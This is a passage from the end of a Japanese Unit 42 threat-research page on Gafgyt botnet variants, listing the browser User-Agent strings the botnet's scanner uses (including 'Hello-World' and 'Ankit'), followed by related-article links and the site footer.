  Chrome/19.0.1084.56 Safari/536.5
* Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko)  
  Chrome/20.0.1132.47 Safari/536.11
* Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_7\_4) AppleWebKit/534.57.2 (KHTML,  
  like Gecko) Version/5.1.7 Safari/534.57.2
* Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
* Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_7\_4) AppleWebKit/536.11 (KHTML,  
  like Gecko) Chrome/20.0.1132.47 Safari/536.11

上記User-Agentに加え、Gafgytボットネットの亜種はスキャナモジュール内で*User-Agent: Hello-World*と*User-Agent: Ankit*を使ってエクスプロイトのリクエストを送信します。
トップに戻る

### タグ

* [Botnet](https://unit42.paloaltonetworks.com/ja/tag/botnet-ja/ "botnet")
* [DDoS](https://unit42.paloaltonetworks.com/ja/tag/ddos-ja/ "DDoS")
* [Exploit kit](https://unit42.paloaltonetworks.com/ja/tag/exploit-kit-ja/ "exploit kit")
* [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/ "IoT")
* [WiFi routers](https://unit42.paloaltonetworks.com/ja/tag/wifi-routers-ja/ "WiFi routers")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:webベースの脅威: 2019年上半期の振り返り](https://unit42.paloaltonetworks.com/ja/web-based-threats-first-half-2019/ "webベースの脅威: 2019年上半期の振り返り")

### 目次

* 

### 関連記事

* [2026年冬季オリンピックに対するロシアのサイバー脅威を理解する](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/ "article - table of contents")
* [QNAP QTS ファームウェアに新たな脆弱性: CVE-2023-50358](https://unit42.paloaltonetworks.com/ja/qnap-qts-firmware-cve-2023-50358/ "article - table of contents")
* [Glupteba の UEFI ブートキットの探索](https://unit42.paloaltonetworks.com/ja/glupteba-malware-uefi-bootkit/ "article - table of contents")

## 関連項目 リソース

![Pictorial representation of a severe Linux vulnerability. Close-up of a woman wearing glasses and focusing intently on a computer screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/05_Vulnerabilities_1920x900-2-1-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年5月5日 [#### Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/)

* [Containers](https://unit42.paloaltonetworks.com/ja/tag/containers-ja/ "Containers")

* [CVE-2026-31431](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-31431/ "CVE-2026-31431")

* [Kubernetes](https://unit42.paloaltonetworks.com/ja/tag/kubernetes-ja/ "Kubernetes")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/ "Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識")  
  ![Pictorial representation of BeyondTrust vulnerability CVE-2026-1731. Digital art depicting a stylized mountain range with vibrant blue and red hues. The peaks are accentuated by glowing particles and an abstract, starry backdrop, creating a futuristic landscape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/14_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月19日 [#### BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/)

* [Bash](https://unit42.paloaltonetworks.com/ja/tag/bash-ja/ "bash")

* [CVE-2026-1731](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1731/ "CVE-2026-1731")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/ "BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認")  
  ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/AdobeStock_1020436911-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月17日 [#### 野放し状態で悪用されているIvanti EPMMの深刻な脆弱性](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/)

* [CVE-2026-1281](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1281/ "CVE-2026-1281")

* [CVE-2026-1340](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1340/ "CVE-2026-1340")

* [Ivanti](https://unit42.paloaltonetworks.com/ja/tag/ivanti-ja/ "Ivanti")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/ "野放し状態で悪用されているIvanti EPMMの深刻な脆弱性")  
  ![Pictorial representation of Muddled Libra, aka Scattered Spider. A vibrant illustration of the Libra zodiac sign, featuring a stylized balance scale overlaid with a prominent Libra symbol. The background is a starry night sky with shades of purple and blue, suggesting a cosmic theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/03-1-Muddle-Libra-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年2月10日 [#### Muddled Libraのプレイブックを覗いてみよう](https://unit42.paloaltonetworks.com/ja/muddled-libra-ops-playbook/)

* [Muddled Libra](https://unit42.paloaltonetworks.com/ja/tag/muddled-libra-ja/ "Muddled Libra")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")

* [Scattered Spider](https://unit42.paloaltonetworks.com/ja/tag/scattered-spider-ja/ "Scattered Spider")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/muddled-libra-ops-playbook/ "Muddled Libraのプレイブックを覗いてみよう")  
  ![Pictorial representation of CVE-2025-0921. Digital illustration of a map of North America with interconnected glowing lines and dots symbolizing network connections across the continent.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/06_Vulnerabilities_1920x900-2-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月30日 [#### SCADAシステムに存在する特権ファイルシステムの脆弱性](https://unit42.paloaltonetworks.com/ja/iconics-suite-cve-2025-0921/)

* [CVE-2025-0921](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-0921/ "CVE-2025-0921")

* [Privilege escalation](https://unit42.paloaltonetworks.com/ja/tag/privilege-escalation-ja/ "privilege escalation")

* [SCADA](https://unit42.paloaltonetworks.com/ja/tag/scada/ "SCADA")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iconics-suite-cve-2025-0921/ "SCADAシステムに存在する特権ファイルシステムの脆弱性")  
  ![Pictorial representation of threat groups from Russia. The silhouette of a bear and the Ursa constellation inside an orange abstract planet. Abstract, stylized cosmic setting with vibrant blue and purple shapes, representing space and distant planetary bodies.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/Ursa-Russia-B-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/ja/category/insights-ja/) 2026年1月29日 [#### 2026年冬季オリンピックに対するロシアのサイバー脅威を理解する](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/)

* [AI](https://unit42.paloaltonetworks.com/ja/tag/ai-ja/ "AI")

* [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/ "IoT")

* [Russia](https://unit42.paloaltonetworks.com/ja/tag/russia-ja/ "Russia")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/ "2026年冬季オリンピックに対するロシアのサイバー脅威を理解する")  
  ![Pictorial representation of remote code execution in AI and machine learning libraries. Close-up of a woman wearing glasses and focusing intently on a computer screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/05_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月13日 [#### 最新のAI/MLフォーマットとライブラリによるリモート コード実行](https://unit42.paloaltonetworks.com/ja/rce-vulnerabilities-in-ai-python-libraries/)

* [Apple](https://unit42.paloaltonetworks.com/ja/tag/apple-ja/ "Apple")

* [CVE-2025-23304](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-23304/ "CVE-2025-23304")

* [CVE-2026-22584](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-22584/ "CVE-2026-22584")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/rce-vulnerabilities-in-ai-python-libraries/ "最新のAI/MLフォーマットとライブラリによるリモート コード実行")  
  ![Pictorial representation of MongoBleed, CVE-2025-14847. Digital image featuring a glowing padlock icon superimposed on a background of streaming blue binary code, symbolizing cybersecurity.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/AdobeStock_233494953-786x429.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年1月13日 [#### 脅威ブリーフ: MongoDB の脆弱性 (CVE-2025-14847)](https://unit42.paloaltonetworks.com/ja/mongobleed-cve-2025-14847/)

* [CVE-2025-14847](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-14847/ "CVE-2025-14847")

* [MongoDB](https://unit42.paloaltonetworks.com/ja/tag/mongodb-ja/ "MongoDB")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/mongobleed-cve-2025-14847/ "脅威ブリーフ: MongoDB の脆弱性 (CVE-2025-14847)")  
  ![Pictorial representation of CVE-2025-55182 (React) and CVE-2025-66478 (Next.js). Close-up of a digital display on electronic equipment with illuminated text reading "SYSTEM HACKED" in red, set against a blurred background of blue and red lights.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/02_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2025年12月12日 [#### React Server Components における重大な脆弱性の悪用 (12月12日更新)](https://unit42.paloaltonetworks.com/ja/cve-2025-55182-react-and-cve-2025-66478-next/)

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [CVE-2025-66478](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-66478-ja/ "CVE-2025-66478")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cve-2025-55182-react-and-cve-2025-66478-next/ "React Server Components における重大な脆弱性の悪用 (12月12日更新)")  
  ![Pictorial representation of 01flip ransomware written in Rust. Digital artwork of a pixelated U.S. dollar bill disintegrating into small blocks against a blue data matrix background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/05_Ransomware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年12月10日 [#### 01flip:Rustで書かれたマルチプラットフォーム ランサムウェア](https://unit42.paloaltonetworks.com/ja/new-ransomware-01flip-written-in-rust/)

* [Bitcoin](https://unit42.paloaltonetworks.com/ja/tag/bitcoin-ja/ "Bitcoin")

* [CL-CRI-103](https://unit42.paloaltonetworks.com/ja/tag/cl-cri-103-ja/ "CL-CRI-103")

* [Cryptocurrency](https://unit42.paloaltonetworks.com/ja/tag/cryptocurrency-ja/ "Cryptocurrency")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/new-ransomware-01flip-written-in-rust/ "01flip:Rustで書かれたマルチプラットフォーム ランサムウェア")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworksJapan/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
